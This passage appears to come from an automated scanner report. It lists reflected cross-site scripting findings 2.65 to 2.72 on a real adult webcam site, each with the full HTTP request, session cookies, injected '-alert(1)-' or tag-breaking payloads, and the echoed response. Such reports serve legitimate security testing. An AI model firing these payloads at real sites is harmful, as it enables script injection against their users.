Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=DEAEMBCBEHGBLGDACDEEAKAD; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:49 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp?6ef1f'><a>f607da23703=1&lr=1107816009&ud=0&pe=homepagems3.asp&qs=6ef1f'>
...[SNIP]...

2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:44 GMT
Connection: close
Content-Length: 40363
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:01 GMT
Connection: close
Content-Length: 40531
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve
...[SNIP]...

2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 25631
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 25778
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:35 GMT
Connection: close
Content-Length: 226523
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1">
...[SNIP]...

2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:10 GMT
Connection: close
Content-Length: 225335
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:10 GMT
Connection: close
Content-Length: 27644
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:19 GMT
Connection: close
Content-Length: 27791
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
